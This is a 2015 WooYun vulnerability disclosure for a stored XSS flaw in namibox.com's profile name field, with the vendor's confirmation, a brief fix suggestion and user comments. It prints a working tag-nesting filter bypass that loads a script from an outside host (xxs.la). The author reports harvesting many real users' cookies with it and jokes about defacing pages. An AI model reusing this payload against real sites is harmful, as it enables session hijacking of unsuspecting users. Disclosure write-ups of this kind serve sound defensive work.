当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114486

漏洞标题:纳米盒存在储存型xss,可打到各种cookies

相关厂商:namibox.com

漏洞作者: Mr.R

提交时间:2015-05-22 19:59

修复时间:2015-05-25 23:28

公开时间:2015-05-25 23:28

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-23: 厂商已经确认,细节仅向厂商公开
2015-05-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

纳米盒存在储存型xss,已打到大量cookies
传说中大量小学僧聚集的地方

详细说明:

纳米盒个人信息处存在储存型xss
个人信息处已经转义",<>等各类特殊字符,但是,在script标签里却没有转义
但是却把script给过滤掉了,但是经过一番努力之后 还是构造出一个妖娆的方法。、、

</</script></script>script><<script>script src=http://xxs.la/oKDXUX></</script></script>script>


先将js中前面的<script>标签闭合,再插入我们的<script>标签

`UDXGVCSGEXM]FGBFV[G)0O.png


然后-、- 带着我们的xss姓名到话题处留言 嘿嘿

2N)H83$7VK)JG$HS4RVFK72.png


T14848Q5(9]HBA(H16_0%QC.png


cookies已经打出翔来了

W%J15EEC}FS$4WUZJ}DO7NG.png


-、- 就算不打cookies 跳转个黑页不是也很好嘛 或者弹个您已被黑的框 -、- 无辜的群众们会怎么想呢

漏洞证明:

纳米盒个人信息处存在储存型xss
个人信息处已经转义",<>等各类特殊字符,但是,在script标签里却没有转义
但是却把script给过滤掉了,但是经过一番努力之后 还是构造出一个妖娆的方法。、、

</</script></script>script><<script>script src=http://xxs.la/oKDXUX></</script></script>script>


先将js中前面的<script>标签闭合,再插入我们的<script>标签

`UDXGVCSGEXM]FGBFV[G)0O.png


然后-、- 带着我们的xss姓名到话题处留言 嘿嘿

2N)H83$7VK)JG$HS4RVFK72.png


T14848Q5(9]HBA(H16_0%QC.png


cookies已经打出翔来了

W%J15EEC}FS$4WUZJ}DO7NG.png


-、- 就算不打cookies 跳转个黑页不是也很好嘛 或者弹个您已被黑的框 -、- 无辜的群众们会怎么想呢

修复方案:

1.不要只注重html标签里的过滤和转义,js中的也要注意。
2.给前台

版权声明:转载请注明来源 Mr.R@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-05-23 09:15

厂商回复:

这个漏洞发现的非常好,如果被恶意使用,会干扰其他用户在网站中看到的内容

最新状态:

2015-05-25:确认并修改了该漏洞,谢谢白帽子


漏洞评价:

评论

  1. 2015-05-19 16:14 | 深蓝 ( 普通白帽子 | Rank:960 漏洞数:220 | 我们不是骇客,我们是黑客,我们维护互联网...)

    看起来好牛逼的样子。

  2. 2015-05-23 11:50 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    @namibox.com 其实我想要的是小礼物 0.0

  3. 2015-05-26 09:35 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    楼上是基友